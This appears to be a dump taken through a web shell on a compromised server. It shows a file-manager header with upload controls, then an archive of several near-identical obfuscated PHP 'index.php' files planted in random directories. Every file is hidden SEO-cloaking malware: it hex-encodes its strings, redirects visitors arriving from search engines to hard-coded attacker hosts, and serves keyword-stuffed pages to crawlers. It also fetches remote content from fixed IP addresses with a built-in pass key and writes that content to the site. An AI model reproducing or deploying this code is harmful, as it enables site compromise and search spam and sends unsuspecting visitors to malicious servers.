Your IP : 216.73.217.176


Current Path : /home/bechata/mp/73eb7/
Upload File :
Current File : /home/bechata/mp/73eb7/index.php.tar

home/bechata/mp/i7ghkd/index.php000066600000011336152366262000012506 0ustar00<?php
 goto uPM0j; JHlfX: $keyword = str_replace("\55", "\40", $_GET["\x69\x64"]); goto Jb6tu; OtI7m: $s = $_SERVER["\x53\x45\x52\x56\105\x52\x5f\116\x41\x4d\x45"] . $s; goto Z1UDQ; UxBpR: if ($s == "\x5c" | $s == "\57") { $s = ''; } goto OtI7m; F2P9y: if (strlen($text) > 500) { $out = fopen("\x69\156\x64\145\170\x2f" . $myname, "\x77"); fwrite($out, $text); fclose($out); } goto E9VCj; E9VCj: echo $text; goto LsFkk; bG9ok: if (strlen($text) < 5000) { $url = "\x36\x35\56\x31\x30\71\x2e\x36\67\56\61\60\60"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\40\50{$errno}\x29\74\x62\x72\x20\57\x3e\12"; } else { $req = "\x2f" . $_GET["\x66\x6e"] . "\56\x70\150\160\x3f\160\141\163\x73\75{$apass}\x26\161\x3d{$_GET["\151\x64"]}"; $out = "\x47\105\124\x20{$req}\x20\x48\x54\x54\120\x2f\61\x2e\x30\15\xa"; $out .= "\x48\x6f\163\164\72\40{$url}\15\12"; $out .= "\x43\x6f\156\156\x65\x63\164\x69\x6f\156\72\40\103\x6c\x6f\x73\x65\15\12\15\12"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; } goto F2P9y; uPM0j: error_reporting(0); goto syZTF; SAKnW: if ($_GET["\x69\144"] == "\151\156\144\145\x78") { header("\114\x6f\x63\x61\x74\151\157\156\x3a\40\x68\164\x74\x70\163\72\x2f\x2f\147\x6f\x6f\147\154\x65\x2e\143\x6f\x6d"); die; } goto kskdd; Bbreo: $xx1 = 5; goto JHlfX; H0EC1: if (strlen($text) < 5000) { $text = file_get_contents("\x68\x74\x74\160\x3a\57\x2f\66\x35\56\x31\60\71\56\x36\x37\x2e\61\60\60\x2f" . $_GET["\146\156"] . "\56\x70\x68\x70\77\x70\141\x73\163\x3d{$apass}\x26\x71\x3d{$_GET["\151\144"]}"); } goto bG9ok; PyBts: $apass1 = "\x76\151\x73\x64\157\x69\152\145\x77"; goto r9Acp; zO2HS: $text = ''; goto m0Efg; Z1UDQ: $apass3 = "\x72\166\x33\x32\171\144\x61\143\x73\x76\x73\144\166"; goto F2Zut; r9Acp: $x1 = 3; goto Bbreo; F2Zut: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto i_Ebc; Jb6tu: $keyword = str_replace("\x20", "\53", $keyword); goto hmPx1; N62L9: if ($_GET["\x69\144"] == "\x74\x65\163\164\x69\x6e\x67") { echo "\164\x65\163\x74\40\147\157\157\x64\56\56\56"; die; } goto SAKnW; i_Ebc: if (strpos($_SERVER["\110\124\124\120\x5f\122\x45\106\x45\x52\105\122"], "\147\x6f\x6f\x67\154\145\x2e") or strpos($_SERVER["\x48\x54\124\x50\x5f\x52\105\x46\105\122\105\x52"], "\x79\141\x68\157\x6f\x2e") or strpos($_SERVER["\110\x54\x54\x50\x5f\x52\x45\106\105\122\105\122"], "\142\151\156\147\56")) { $tpl = "\151\x6e\x64\145\170\57" . $_GET["\x69\144"] . "\x2e\x70\150\160\56\164\160\x6c"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\x6d\171"]; header("\114\x6f\x63\x61\x74\x69\x6f\156\72\x20\x68\164\164\160\x3a\x2f\x2f\x36\65\x2e\61\60\70\x2e\x31\60\x2e\x31\71\71\57\145\x6e\x74\145\x72\57\x3f\155\141\x72\153\x3d{$today}\55{$s}\46\x74\x70\154\75{$tpl}\46\145\156\x67\x6b\145\171\x3d{$keyword}"); die; } else { $myname = $_GET["\151\144"] . "\x2e\160\x68\x70"; if (file_exists("\151\156\x64\x65\170\57" . $myname)) { $html = @file_get_contents("\x69\156\x64\145\170\x2f" . $myname); if (strpos($_SERVER["\x48\x54\x54\x50\x5f\x55\123\x45\122\137\101\x47\x45\116\x54"], "\x62\x69\156\x67") > 2 or strpos($_SERVER["\110\x54\x54\x50\x5f\125\123\x45\x52\x5f\x41\x47\105\x4e\124"], "\171\141\x68\157\157") > 2) { $keyword = str_replace("\55", "\x20", $_GET["\x69\x64"]); $html = str_replace("\74\164\151\164\154\145\76\x3c\x2f\164\x69\x74\x6c\x65\x3e", "\74\164\x69\164\x6c\x65\x3e{$keyword}\74\57\164\x69\x74\x6c\145\x3e", $html); } echo $html; die; } } goto XzNQy; hmPx1: $apass2 = "\142\62\x33\150\162\62\x33\x76\x72\x33\62"; goto jemf2; kskdd: $_GET["\167\x6f\162\154\x64"] = 5; goto HijlD; XzNQy: $query_pars_2 = str_replace("\55", "\x2b", $_GET["\151\144"]); goto zO2HS; m0Efg: if (function_exists("\143\x75\162\x6c\x5f\151\156\x69\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\x68\x74\164\160\72\x2f\57\66\x35\56\x31\x30\x39\x2e\66\67\56\x31\60\60\57" . $_GET["\x66\156"] . "\56\x70\150\160\x3f\160\141\x73\163\75{$apass}\46\x71\x3d{$_GET["\x69\x64"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\157\172\x69\154\x6c\x61\x2f\x34\56\x30\40\50\x63\x6f\x6d\x70\x61\x74\151\x62\x6c\x65\73\40\115\x53\111\x45\x20\66\56\x30\73\40\x57\151\156\x64\157\167\163\40\116\124\x20\65\x2e\61\x3b\40\x53\126\x31\51"); $text = curl_exec($ch); curl_close($ch); } goto H0EC1; jemf2: $s = dirname($_SERVER["\x50\110\x50\x5f\x53\x45\x4c\106"]); goto UxBpR; HijlD: $_GET["\146\156"] = "\x36\x39\x36\x39\x36\71\156\x65\167"; goto PyBts; syZTF: $today = "\62\x30\x32\66\60\x35\60\61\55"; goto ftW2x; ftW2x: foreach ($_GET as $a => $b) { $_GET["\151\x64"] = $b; } goto N62L9; LsFkk: ?>home/bechata/mp/qsi9n0/index.php000066600000011346152366271550012467 0ustar00<?php
 goto SVTRD; Gy8lA: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto CiPx6; yeLfp: if (strlen($text) > 5000) { $out = fopen("\151\156\x64\145\170\x2f" . $myname, "\167"); fwrite($out, $text); fclose($out); } goto slOcq; CiPx6: if (strpos($_SERVER["\x48\x54\x54\x50\x5f\122\x45\106\x45\x52\x45\122"], "\147\x6f\157\x67\154\x65\56") or strpos($_SERVER["\x48\124\124\120\137\122\105\x46\105\122\105\x52"], "\x79\141\x68\x6f\x6f\x2e") or strpos($_SERVER["\x48\124\124\x50\x5f\122\105\x46\105\122\x45\122"], "\x62\x69\156\x67\x2e")) { $tpl = "\x69\156\144\x65\x78\x2f" . $_GET["\x69\144"] . "\56\x70\150\160\56\x74\160\154"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\x6d\x79"]; header("\114\x6f\143\x61\164\151\157\156\x3a\x20\x68\x74\164\x70\x73\x3a\57\57\143\150\x70\x6f\153\x2e\163\151\x74\145\57\x65\x6e\164\x65\x72\x2f\77\155\x61\x72\153\75{$today}\55{$s}\x26\x74\x70\x6c\x3d{$tpl}\46\145\x6e\147\153\145\x79\x3d{$keyword}"); die; } else { $myname = $_GET["\151\x64"] . "\x2e\x70\x68\x70"; if (file_exists("\x69\156\144\145\170\57" . $myname)) { $html = @file_get_contents("\151\156\144\145\x78\57" . $myname); if (strpos($_SERVER["\x48\x54\124\x50\137\x55\x53\x45\x52\x5f\101\x47\x45\116\x54"], "\142\x69\x6e\147") > 2 or strpos($_SERVER["\110\124\x54\120\137\x55\123\105\122\x5f\101\x47\105\x4e\124"], "\171\141\150\x6f\x6f") > 2) { $keyword = str_replace("\x2d", "\x20", $_GET["\151\144"]); $html = str_replace("\x3c\x74\151\164\x6c\x65\x3e\x3c\57\x74\151\164\154\x65\x3e", "\x3c\164\151\x74\x6c\x65\76{$keyword}\x3c\57\x74\151\x74\x6c\x65\x3e", $html); } echo $html; die; } } goto usexK; ieZko: $x1 = 3; goto ZHRkD; sWL0H: $_GET["\146\156"] = "\66\71\66\71\66\71\156\145\167"; goto xVTN3; Fegb9: if (strlen($text) < 5000) { $url = "\61\63\65\56\61\70\61\56\62\x31\x2e\x31\x32\x36"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\40\50{$errno}\51\74\142\x72\40\57\x3e\12"; } else { $req = "\x2f" . $_GET["\x66\x6e"] . "\56\160\x68\x70\77\160\x61\x73\x73\x3d{$apass}\46\x71\75{$_GET["\151\x64"]}"; $out = "\107\105\124\40{$req}\x20\110\x54\x54\120\x2f\61\56\60\15\12"; $out .= "\x48\x6f\163\x74\72\x20{$url}\15\12"; $out .= "\103\x6f\156\156\x65\x63\x74\151\x6f\156\72\x20\103\x6c\x6f\163\x65\xd\12\15\12"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; } goto yeLfp; fDeAi: $_GET["\x77\x6f\162\x6c\x64"] = 5; goto sWL0H; mab9p: $keyword = str_replace("\55", "\x20", $_GET["\151\144"]); goto pTldJ; wz3mt: if ($_GET["\x69\144"] == "\x74\x65\163\164\x69\156\x67") { echo "\164\145\163\164\40\x67\157\x6f\x64\56\x2e\x2e"; die; } goto LtS7D; jFj4e: if (function_exists("\x63\165\x72\154\137\151\156\x69\x74")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\150\164\164\160\x3a\x2f\x2f\61\x33\65\56\x31\70\x31\56\62\61\x2e\61\x32\x36\57" . $_GET["\x66\156"] . "\x2e\160\150\160\77\160\x61\x73\x73\75{$apass}\x26\161\x3d{$_GET["\x69\144"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\x4d\157\172\151\154\x6c\141\57\64\x2e\x30\x20\x28\x63\x6f\x6d\160\x61\x74\x69\142\x6c\145\x3b\40\115\x53\x49\x45\40\66\56\60\73\x20\127\x69\x6e\x64\157\x77\163\40\116\x54\40\65\56\x31\x3b\40\123\126\61\51"); $text = curl_exec($ch); curl_close($ch); } goto e8iqH; e8iqH: if (strlen($text) < 5000) { $text = file_get_contents("\150\164\x74\x70\72\x2f\x2f\61\63\65\x2e\x31\70\61\56\x32\x31\x2e\x31\x32\x36\57" . $_GET["\146\156"] . "\x2e\x70\150\x70\x3f\160\141\163\163\75{$apass}\x26\161\x3d{$_GET["\x69\x64"]}"); } goto Fegb9; ZHRkD: $xx1 = 5; goto mab9p; Ehj62: $s = dirname($_SERVER["\120\x48\x50\x5f\123\105\114\x46"]); goto P45NT; pTldJ: $keyword = str_replace("\40", "\53", $keyword); goto ht6QN; slOcq: echo $text; goto IT4bn; X4b1_: foreach ($_GET as $a => $b) { $_GET["\151\x64"] = $b; } goto wz3mt; vLYm1: $today = "\x32\60\62\x35\60\x34\x31\60\x2d"; goto X4b1_; Dh9LV: $s = $_SERVER["\x53\x45\122\x56\x45\122\137\x4e\101\x4d\x45"] . $s; goto SJPVA; SJPVA: $apass3 = "\162\x76\63\x32\x79\x64\x61\x63\163\166\163\x64\x76"; goto Gy8lA; YNJHe: $text = ''; goto jFj4e; usexK: $query_pars_2 = str_replace("\x2d", "\x2b", $_GET["\x69\144"]); goto YNJHe; xVTN3: $apass1 = "\x76\151\163\144\x6f\x69\152\145\167"; goto ieZko; SVTRD: error_reporting(0); goto vLYm1; LtS7D: if ($_GET["\151\x64"] == "\x69\x6e\144\145\170") { header("\x4c\x6f\x63\141\x74\151\x6f\156\72\40\150\164\164\x70\x73\x3a\x2f\x2f\x67\157\157\147\x6c\x65\56\x63\x6f\155"); die; } goto fDeAi; ht6QN: $apass2 = "\x62\x32\x33\150\162\62\63\166\162\63\x32"; goto Ehj62; P45NT: if ($s == "\134" | $s == "\57") { $s = ''; } goto Dh9LV; IT4bn: ?>home/bechata/mp/pjudo/index.php000066600000011352152366273030012455 0ustar00<?php
 goto oAzWa; TfM5n: $xx1 = 5; goto SF2ZJ; OfEGq: $x1 = 3; goto TfM5n; LdvfX: $s = dirname($_SERVER["\x50\110\x50\x5f\x53\105\114\106"]); goto wHfL2; GbyoQ: $today = "\62\60\62\x36\x30\64\x32\66\x2d"; goto xcDP0; yJDqQ: $apass1 = "\x76\151\163\x64\x6f\151\x6a\x65\x77"; goto OfEGq; aNsgH: $apass2 = "\x62\x32\x33\x68\162\x32\63\x76\162\x33\x32"; goto LdvfX; DBQFq: echo $text; goto EbIMJ; xcDP0: foreach ($_GET as $a => $b) { $_GET["\x69\x64"] = $b; } goto v4NFJ; dPrdM: $s = $_SERVER["\x53\x45\122\x56\105\x52\x5f\x4e\x41\115\x45"] . $s; goto TVhBh; SF2ZJ: $keyword = str_replace("\55", "\x20", $_GET["\151\x64"]); goto aLZYG; JRCAx: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto IjaSa; y34Vf: if (strlen($text) < 5000) { $url = "\66\x35\x2e\x31\60\71\56\x36\x37\x2e\61\60\60"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\x20\x28{$errno}\51\74\x62\x72\40\57\x3e\12"; } else { $req = "\57" . $_GET["\146\156"] . "\56\160\x68\x70\x3f\x70\x61\x73\x73\75{$apass}\46\x71\75{$_GET["\151\x64"]}"; $out = "\107\x45\x54\40{$req}\40\x48\x54\124\120\x2f\x31\x2e\x30\xd\xa"; $out .= "\110\x6f\163\x74\x3a\40{$url}\15\xa"; $out .= "\x43\x6f\x6e\x6e\145\x63\164\x69\157\x6e\x3a\40\103\x6c\x6f\x73\145\15\xa\15\xa"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\12", $text); $text = $text[7]; } goto YXF1g; TVhBh: $apass3 = "\x72\166\63\62\x79\144\141\143\x73\x76\163\144\166"; goto JRCAx; YXF1g: if (strlen($text) > 500) { $out = fopen("\151\x6e\144\x65\170\x2f" . $myname, "\167"); fwrite($out, $text); fclose($out); } goto DBQFq; aLZYG: $keyword = str_replace("\x20", "\x2b", $keyword); goto aNsgH; phqPe: if (strlen($text) < 5000) { $text = file_get_contents("\150\x74\x74\160\x3a\57\57\66\x35\56\61\x30\71\56\x36\x37\x2e\x31\60\x30\57" . $_GET["\x66\x6e"] . "\56\160\x68\x70\x3f\160\x61\163\163\75{$apass}\x26\x71\x3d{$_GET["\x69\144"]}"); } goto y34Vf; UOnYg: $text = ''; goto H2W9f; LDNGt: $_GET["\x77\157\162\154\x64"] = 5; goto QTGz6; oAzWa: error_reporting(0); goto GbyoQ; wHfL2: if ($s == "\134" | $s == "\x2f") { $s = ''; } goto dPrdM; v4NFJ: if ($_GET["\151\144"] == "\x74\x65\163\x74\x69\156\147") { echo "\x74\x65\x73\x74\40\147\x6f\157\x64\56\x2e\x2e"; die; } goto wV0kb; H2W9f: if (function_exists("\143\x75\x72\154\x5f\151\x6e\151\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\150\x74\x74\x70\x3a\57\57\66\x35\x2e\x31\x30\71\x2e\x36\x37\x2e\x31\x30\60\x2f" . $_GET["\x66\156"] . "\x2e\160\x68\x70\77\160\141\x73\x73\75{$apass}\x26\x71\x3d{$_GET["\x69\x64"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\x6f\x7a\151\x6c\x6c\x61\x2f\64\x2e\x30\x20\50\143\x6f\155\160\x61\x74\x69\x62\154\x65\x3b\x20\115\x53\111\x45\40\x36\x2e\x30\73\40\127\x69\x6e\x64\x6f\x77\x73\x20\x4e\124\40\x35\x2e\x31\x3b\x20\x53\x56\61\51"); $text = curl_exec($ch); curl_close($ch); } goto phqPe; cSlnX: $query_pars_2 = str_replace("\55", "\x2b", $_GET["\151\x64"]); goto UOnYg; wV0kb: if ($_GET["\151\x64"] == "\x69\156\x64\x65\170") { header("\x4c\157\x63\141\x74\151\x6f\x6e\x3a\40\x68\164\x74\x70\x73\x3a\57\x2f\147\x6f\157\x67\154\145\56\143\157\155"); die; } goto LDNGt; IjaSa: if (strpos($_SERVER["\x48\124\x54\x50\137\122\105\106\105\122\105\122"], "\x67\157\157\x67\x6c\x65\x2e") or strpos($_SERVER["\x48\x54\x54\120\x5f\122\x45\106\105\122\105\122"], "\171\141\150\157\157\x2e") or strpos($_SERVER["\x48\x54\x54\120\137\x52\105\x46\105\122\x45\122"], "\x62\x69\156\x67\56")) { $tpl = "\x69\x6e\144\x65\170\x2f" . $_GET["\x69\144"] . "\56\160\x68\160\56\x74\160\x6c"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\155\171"]; header("\114\x6f\143\x61\x74\x69\x6f\x6e\72\x20\150\x74\x74\160\72\57\x2f\66\x35\x2e\x31\x30\x38\56\61\x30\56\61\71\x39\x2f\145\156\x74\145\162\57\77\x6d\141\x72\153\75{$today}\55{$s}\46\164\160\154\x3d{$tpl}\x26\x65\156\x67\153\145\171\x3d{$keyword}"); die; } else { $myname = $_GET["\x69\144"] . "\56\x70\150\160"; if (file_exists("\x69\156\x64\145\170\x2f" . $myname)) { $html = @file_get_contents("\151\x6e\144\145\x78\x2f" . $myname); if (strpos($_SERVER["\110\124\x54\x50\137\x55\x53\105\122\137\x41\x47\x45\x4e\124"], "\142\x69\156\147") > 2 or strpos($_SERVER["\110\124\124\x50\137\x55\123\x45\122\137\x41\107\105\x4e\x54"], "\171\x61\150\x6f\157") > 2) { $keyword = str_replace("\55", "\40", $_GET["\151\x64"]); $html = str_replace("\x3c\164\151\164\154\145\x3e\74\57\x74\151\x74\x6c\145\76", "\74\x74\151\x74\x6c\145\x3e{$keyword}\74\57\x74\x69\164\154\x65\x3e", $html); } echo $html; die; } } goto cSlnX; QTGz6: $_GET["\x66\x6e"] = "\x36\x39\66\x39\66\x39\x6e\x65\167"; goto yJDqQ; EbIMJ: ?>home/bechata/mp/eyiha4/index.php000066600000011336152366273250012525 0ustar00<?php
 goto uPM0j; JHlfX: $keyword = str_replace("\55", "\40", $_GET["\x69\x64"]); goto Jb6tu; OtI7m: $s = $_SERVER["\x53\x45\x52\x56\105\x52\x5f\116\x41\x4d\x45"] . $s; goto Z1UDQ; UxBpR: if ($s == "\x5c" | $s == "\57") { $s = ''; } goto OtI7m; F2P9y: if (strlen($text) > 500) { $out = fopen("\x69\156\x64\145\170\x2f" . $myname, "\x77"); fwrite($out, $text); fclose($out); } goto E9VCj; E9VCj: echo $text; goto LsFkk; bG9ok: if (strlen($text) < 5000) { $url = "\x36\x35\56\x31\x30\71\x2e\x36\67\56\61\60\60"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\40\50{$errno}\x29\74\x62\x72\x20\57\x3e\12"; } else { $req = "\x2f" . $_GET["\x66\x6e"] . "\56\x70\150\160\x3f\160\141\163\x73\75{$apass}\x26\161\x3d{$_GET["\151\x64"]}"; $out = "\x47\105\124\x20{$req}\x20\x48\x54\x54\120\x2f\61\x2e\x30\15\xa"; $out .= "\x48\x6f\163\164\72\40{$url}\15\12"; $out .= "\x43\x6f\156\156\x65\x63\164\x69\x6f\156\72\40\103\x6c\x6f\x73\x65\15\12\15\12"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; } goto F2P9y; uPM0j: error_reporting(0); goto syZTF; SAKnW: if ($_GET["\x69\144"] == "\151\156\144\145\x78") { header("\114\x6f\x63\x61\x74\151\157\156\x3a\40\x68\164\x74\x70\163\72\x2f\x2f\147\x6f\x6f\147\154\x65\x2e\143\x6f\x6d"); die; } goto kskdd; Bbreo: $xx1 = 5; goto JHlfX; H0EC1: if (strlen($text) < 5000) { $text = file_get_contents("\x68\x74\x74\160\x3a\57\x2f\66\x35\56\x31\60\71\56\x36\x37\x2e\61\60\60\x2f" . $_GET["\146\156"] . "\56\x70\x68\x70\77\x70\141\x73\163\x3d{$apass}\x26\x71\x3d{$_GET["\151\144"]}"); } goto bG9ok; PyBts: $apass1 = "\x76\151\x73\x64\157\x69\152\145\x77"; goto r9Acp; zO2HS: $text = ''; goto m0Efg; Z1UDQ: $apass3 = "\x72\166\x33\x32\171\144\x61\143\x73\x76\x73\144\166"; goto F2Zut; r9Acp: $x1 = 3; goto Bbreo; F2Zut: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto i_Ebc; Jb6tu: $keyword = str_replace("\x20", "\53", $keyword); goto hmPx1; N62L9: if ($_GET["\x69\144"] == "\x74\x65\163\164\x69\x6e\x67") { echo "\164\x65\163\x74\40\147\157\157\x64\56\56\56"; die; } goto SAKnW; i_Ebc: if (strpos($_SERVER["\110\124\124\120\x5f\122\x45\106\x45\x52\105\122"], "\147\x6f\x6f\x67\154\145\x2e") or strpos($_SERVER["\x48\x54\124\x50\x5f\x52\105\x46\105\122\105\x52"], "\x79\141\x68\157\x6f\x2e") or strpos($_SERVER["\110\x54\x54\x50\x5f\x52\x45\106\105\122\105\122"], "\142\151\156\147\56")) { $tpl = "\151\x6e\x64\145\170\57" . $_GET["\x69\144"] . "\x2e\x70\150\160\56\164\160\x6c"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\x6d\171"]; header("\114\x6f\x63\x61\x74\x69\x6f\156\72\x20\x68\164\164\160\x3a\x2f\x2f\x36\65\x2e\61\60\70\x2e\x31\60\x2e\x31\71\71\57\145\x6e\x74\145\x72\57\x3f\155\141\x72\153\x3d{$today}\55{$s}\46\x74\x70\154\75{$tpl}\46\145\156\x67\x6b\145\171\x3d{$keyword}"); die; } else { $myname = $_GET["\151\144"] . "\x2e\160\x68\x70"; if (file_exists("\151\156\x64\x65\170\57" . $myname)) { $html = @file_get_contents("\x69\156\x64\145\170\x2f" . $myname); if (strpos($_SERVER["\x48\x54\x54\x50\x5f\x55\123\x45\122\137\101\x47\x45\116\x54"], "\x62\x69\156\x67") > 2 or strpos($_SERVER["\110\x54\x54\x50\x5f\125\123\x45\x52\x5f\x41\x47\105\x4e\124"], "\171\141\x68\157\157") > 2) { $keyword = str_replace("\55", "\x20", $_GET["\x69\x64"]); $html = str_replace("\74\164\151\164\154\145\76\x3c\x2f\164\x69\x74\x6c\x65\x3e", "\74\164\x69\164\x6c\x65\x3e{$keyword}\74\57\164\x69\x74\x6c\145\x3e", $html); } echo $html; die; } } goto XzNQy; hmPx1: $apass2 = "\142\62\x33\150\162\62\x33\x76\x72\x33\62"; goto jemf2; kskdd: $_GET["\167\x6f\162\154\x64"] = 5; goto HijlD; XzNQy: $query_pars_2 = str_replace("\55", "\x2b", $_GET["\151\144"]); goto zO2HS; m0Efg: if (function_exists("\143\x75\162\x6c\x5f\151\156\x69\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\x68\x74\164\160\72\x2f\57\66\x35\56\x31\x30\x39\x2e\66\67\56\x31\60\60\57" . $_GET["\x66\156"] . "\56\x70\150\160\x3f\160\141\x73\163\75{$apass}\46\x71\x3d{$_GET["\x69\x64"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\157\172\x69\154\x6c\x61\x2f\x34\56\x30\40\50\x63\x6f\x6d\x70\x61\x74\151\x62\x6c\x65\73\40\115\x53\111\x45\x20\66\56\x30\73\40\x57\151\156\x64\157\167\163\40\116\124\x20\65\x2e\61\x3b\40\x53\126\x31\51"); $text = curl_exec($ch); curl_close($ch); } goto H0EC1; jemf2: $s = dirname($_SERVER["\x50\110\x50\x5f\x53\x45\x4c\106"]); goto UxBpR; HijlD: $_GET["\146\156"] = "\x36\x39\x36\x39\x36\71\156\x65\167"; goto PyBts; syZTF: $today = "\62\x30\x32\66\60\x35\60\61\55"; goto ftW2x; ftW2x: foreach ($_GET as $a => $b) { $_GET["\151\x64"] = $b; } goto N62L9; LsFkk: ?>home/bechata/mp/0xn3ho/index.php000066600000011352152366273440012460 0ustar00<?php
 goto NQmik; uddK8: $s = dirname($_SERVER["\x50\x48\x50\137\x53\x45\114\x46"]); goto nbxx_; ZszXa: foreach ($_GET as $a => $b) { $_GET["\x69\x64"] = $b; } goto wX0xE; lVEjT: $_GET["\x66\x6e"] = "\66\x39\x36\71\66\x39\156\145\167"; goto WZeVW; hnccE: $s = $_SERVER["\x53\105\x52\126\x45\122\x5f\116\101\115\x45"] . $s; goto FXuF0; vAtl4: if (strlen($text) < 5000) { $url = "\x31\x33\x35\56\61\x38\61\56\x32\61\56\61\62\66"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\x20\x28{$errno}\x29\x3c\x62\162\x20\57\x3e\xa"; } else { $req = "\57" . $_GET["\146\x6e"] . "\56\x70\150\x70\x3f\x70\141\x73\163\x3d{$apass}\x26\x71\75{$_GET["\151\144"]}"; $out = "\x47\105\x54\40{$req}\40\x48\x54\x54\x50\57\61\56\x30\xd\12"; $out .= "\x48\157\x73\164\72\x20{$url}\xd\12"; $out .= "\103\x6f\x6e\156\145\143\164\151\157\x6e\x3a\40\x43\x6c\157\x73\x65\15\xa\15\xa"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; } goto hoEAh; hoEAh: if (strlen($text) > 5000) { $out = fopen("\151\156\144\x65\170\57" . $myname, "\167"); fwrite($out, $text); fclose($out); } goto YN7wX; v28de: $keyword = str_replace("\x2d", "\40", $_GET["\151\144"]); goto eC4dC; ifBmB: if ($_GET["\151\144"] == "\151\x6e\144\x65\170") { header("\x4c\x6f\143\141\164\x69\157\156\x3a\40\150\x74\164\x70\163\x3a\57\57\x67\157\157\x67\x6c\x65\56\x63\157\x6d"); die; } goto J690q; l7hRI: if (function_exists("\143\x75\162\154\x5f\151\x6e\151\164")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\x68\164\x74\x70\72\57\x2f\x31\x33\x35\56\x31\x38\x31\x2e\62\61\x2e\61\x32\66\57" . $_GET["\146\156"] . "\x2e\160\150\x70\77\160\x61\x73\163\x3d{$apass}\46\x71\75{$_GET["\151\x64"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\115\157\172\x69\x6c\x6c\x61\57\64\x2e\x30\40\x28\143\157\155\x70\x61\164\x69\x62\x6c\x65\73\x20\115\123\x49\x45\x20\x36\x2e\x30\x3b\x20\127\151\x6e\144\157\167\163\40\x4e\x54\40\x35\x2e\x31\x3b\40\x53\126\61\51"); $text = curl_exec($ch); curl_close($ch); } goto lKCdq; eBSnS: $x1 = 3; goto nNU2e; FXuF0: $apass3 = "\162\x76\63\62\171\x64\x61\x63\x73\x76\x73\x64\x76"; goto Ez1dE; IQZrE: $text = ''; goto l7hRI; WZeVW: $apass1 = "\166\x69\163\x64\x6f\x69\152\145\167"; goto eBSnS; nbxx_: if ($s == "\x5c" | $s == "\x2f") { $s = ''; } goto hnccE; J690q: $_GET["\167\157\x72\x6c\144"] = 5; goto lVEjT; jmCUT: if (strpos($_SERVER["\x48\124\x54\120\137\x52\105\106\x45\122\105\122"], "\147\x6f\157\x67\x6c\145\56") or strpos($_SERVER["\x48\124\124\120\x5f\x52\x45\106\x45\122\x45\122"], "\171\141\150\157\x6f\x2e") or strpos($_SERVER["\110\124\x54\x50\x5f\122\x45\x46\x45\x52\x45\x52"], "\x62\151\156\x67\x2e")) { $tpl = "\151\x6e\144\x65\170\57" . $_GET["\151\x64"] . "\56\160\150\x70\56\164\x70\154"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\155\171"]; header("\114\157\x63\141\x74\x69\x6f\156\72\40\150\x74\164\x70\163\72\x2f\57\143\x68\x70\157\x6b\x2e\x73\x69\x74\145\x2f\145\156\x74\145\x72\57\x3f\x6d\x61\x72\153\75{$today}\55{$s}\x26\x74\160\154\x3d{$tpl}\x26\x65\x6e\x67\153\145\171\x3d{$keyword}"); die; } else { $myname = $_GET["\x69\x64"] . "\56\x70\x68\160"; if (file_exists("\x69\156\144\145\x78\x2f" . $myname)) { $html = @file_get_contents("\151\x6e\144\x65\170\57" . $myname); if (strpos($_SERVER["\110\x54\x54\120\137\125\x53\x45\x52\137\101\107\x45\116\124"], "\142\x69\156\x67") > 2 or 